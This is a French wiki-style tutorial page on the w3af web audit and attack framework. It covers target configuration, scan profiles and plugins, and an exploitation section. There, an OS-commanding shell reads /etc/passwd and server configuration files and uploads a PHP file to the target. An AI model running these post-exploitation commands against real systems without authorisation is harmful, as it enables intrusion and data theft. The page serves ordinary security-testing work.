W3af
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Nom complet | Web Application Attack and Audit Framework |
| Type | Framework d'audit web (CLI + GUI) |
| Enchaînement | Détection puis exploitation (sqlmap…) |
| Voir aussi | Wapiti · Arachni · Sqlmap |
w3af (Web Application Attack and Audit Framework) est un framework d'audit et d'attaque d'applications web. Doté d'une interface graphique et d'une console, il scanne un site, détecte les failles et fournit des informations (URL, méthodes d'authentification) exploitables ensuite, par exemple avec Sqlmap.
Configuration de la cible
>>> help
>>> keys
w3af>>> target
w3af/config:target>>> view
w3af/config:target>>> set target_os unix
w3af/config:target>>> set target_framework php
w3af/config:target>>> set target http://blog.exemple.tld
w3af/config:target>>> back
Réglages divers (fuzzing des cookies) et en-têtes HTTP (user agent) :
w3af>>> misc-settings
w3af/config:misc-settings>>> set fuzz_cookies True
w3af/config:misc-settings>>> back
w3af>>> http-settings
w3af/config:http-settings>>> set user_agent Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
w3af/config:http-settings>>> back
Le user agent se choisit selon le navigateur à imiter (voir une liste de chaînes user agent de référence).
Profils et plugins
w3af>>> profiles
w3af/profiles>>> list
w3af/profiles>>> use full_audit
w3af/profiles>>> back
w3af>>> plugins
w3af/plugins>>> list output
w3af/plugins>>> output config console
w3af/plugins/output/config:console>>> set verbose true
w3af/plugins/output/config:console>>> back
w3af/plugins>>> output all,!xml_file
w3af/plugins>>> grep
w3af/plugins>>> grep codeDisclosure,directoryIndexing,domXss,errorPages,error500,fileUpload,httpAuthDetect,oracle,pathDisclosure
w3af>>> start
Exploitation
À l'issue du scan, w3af peut enchaîner sur l'exploitation (exemple avec sqlmap et une faille d'os commanding) :
w3af>>> exploit
w3af/exploit>>> list
w3af/exploit>>> exploit sqlmap
w3af/exploit>>> interact 0
w3af/exploit/os_commanding-0>>> e id
w3af/exploit/os_commanding-0>>> e uname -a
w3af/exploit/os_commanding-0>>> e pwd
w3af/exploit/os_commanding-0>>> read /etc/passwd
w3af/exploit/os_commanding-0>>> lsp
w3af/exploit/os_commanding-0>>> payload apache_config_files
w3af/exploit/os_commanding-0>>> read /etc/httpd/conf/httpd.conf
w3af/exploit/os_commanding-0>>> payload users
w3af/exploit/os_commanding-0>>> upload /home/localfile.php upload.php
Voir aussi
- Wapiti, Arachni, Vega — autres outils d'audit web
- Sqlmap — exploitation d'injections SQL
- Catégorie:Reconnaissance